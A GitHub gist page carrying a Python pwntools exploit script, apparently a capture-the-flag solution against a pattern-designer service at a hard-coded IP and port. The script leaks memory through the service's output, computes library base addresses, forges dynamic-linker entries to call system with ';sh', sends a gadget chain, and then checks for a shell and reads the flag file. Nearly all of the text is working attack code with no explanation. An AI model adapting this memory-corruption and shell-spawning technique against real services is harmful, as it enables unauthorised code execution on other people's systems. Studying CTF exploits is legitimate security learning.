Create a gist now

Instantly share code, notes, and snippets.

@Idolf /doit.py Secret
Created Mar 23, 2015

What would you like to do?
from pwn import *
pattern = 'ABCD'
# r = process('./wrapper.sh')
# r = remote('192.168.1.104', 6665)
r = remote('146.148.60.107', 6665)
libc_base = 0xf75b4000
# libc_base_alt = int(read('/proc/%d/maps' % pidof(r)[0]).split('\n')[4].split('-')[0], 16)
# libc_base = libc_base_alt
# print hex(libc_base_alt)
# print hex(libc_base ^ libc_base_alt)
# if libc_base == libc_base_alt:
# splash()
do_system = libc_base + 0x3A880
gadget = libc_base + 0x0016cb25
# print hex(libc_base)
def do_upload_pattern(pattern, author = 'A'):
sqrt = int(len(pattern) ** 0.5)
assert sqrt ** 2 == len(pattern)
assert 2 <= sqrt <= 24
assert 0 <= len(author) <= 0x3f
r.sendlineafter('> ', '2')
r.sendlineafter('Pattern size? ', str(sqrt * 2))
r.sendlineafter("Pattern designer's name? ", author)
r.sendafter('Pattern raw data? \n', pattern)
r.sendlineafter('> ', '3')
def do_beautify():
r.sendlineafter('> ', '3')
def do_exit():
r.sendlineafter('> ', '5')
def vertical(n):
return ((n & 0x33333333) << 2) | ((n & 0xcccccccc) >> 2)
def horizontal(n):
return ((n & 0x0f0f0f0f) << 4) | ((n & 0xf0f0f0f0) >> 4)
SIZE = 60
data = cyclic(43) + p32(horizontal(SIZE*2)) + p32(horizontal(1))
do_upload_pattern(data.ljust(13*13))
do_beautify()
r.recvuntil('SYSTEM.\n')
lines = [r.recvline().rstrip('\n') for _ in range(SIZE*2)]
out = ''
bd = {
'|': 0,
'-': 1,
'*': 2,
' ': 3
}
for row in range(SIZE):
for col in range(SIZE):
c0 = lines[row * 2][4*col]
c1 = lines[row * 2][4*col+2]
c2 = lines[row * 2+1][4*col]
c3 = lines[row * 2+1][4*col+2]
b = bd[c0] | (bd[c1] << 2) | (bd[c2] << 4) | (bd[c3] << 6)
out += chr(b)
ld_ptr = u32(out[0x2cc:0x2d0])
ld_base = ld_ptr - 0x228e4
dynamic = [
# Group 0
0xdeadbeef, 0xdeadbeef,
0xdeadbeef, 0xdeadbeef,
0xdeadbeef, 0xdeadbeef,
0x1 , 0x10,
0xc , 0x804846c,
0xd , 0x8048efc,
# Group 1
0x6ffffef5, 0x80481cc,
# 0x5 , 0x80482f8 + 52,
0x5 , 0x804b3e4 - (0x321 - 0x2f8) - 3,
0x6 , 0x80481f8,
0xa , 0xac,
0xb , 0x10,
0x15 , 0xf77128e4,
# Group 2
0x3 , 0x804aff4,
0x2 , 0x60,
0x14 , 0x11,
0x17 , 0x804840c,
0x11 , 0x80483f4,
0x12 , 0x18,
# Group 3
0x13 , 0x8,
0x6ffffffe, 0x80483c4,
0x6fffffff, 0x1,
0x6ffffff0, 0x80483a4,
0x0 , 0x0,
0x0 , 0x0,
# Group 4,
0 , 0,
0 , 0,
0 , 0,
do_system , ';sh\0',
0 , '\0rea',
'd\0\0\0' , '\0\0\0\0',
# Group 5
0 , 0,
0 , 0,
0 , 0
] + group(4, 'wcsdup\0', 'fill', '\0')
choose = [
(1, 1, 1, 1, 1, 1),
(0, 0, 0, 0, 0, 0),
(0, 0, 1, 1, 1, 1),
(0, 0, 0, 0, 1, 1),
(1, 1, 1, 1, 1, 1),
(1, 1, 1, 1, 1, 1),
]
z = zip(choose, group(2, group(6, dynamic, 'fill', 0)))
dynamic = ''
for choice, (a, b) in z:
b = tuple(reversed(b))
for n in range(6):
if choice[n]:
dynamic += p32(vertical(u32(flat(b[n]))))[::-1]
else:
dynamic += flat(a[n])
data = 312 * 'A' + dynamic
data = data.ljust(24*24)
do_upload_pattern(data)
do_beautify()
do_exit()
r.recvuntil('Have a nice day! Bye bye!\n')
r.sendline(p32(0x804f7d4) + p32(gadget) * 12 + cyclic(1600))
sleep(0.1)
try:
r.recv()
r.sendline('echo MARKER')
assert 'MARKER' in r.recvline(timeout = 1.0)
r.sendline('cat flag')
r.interactive()
except EOFError:
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment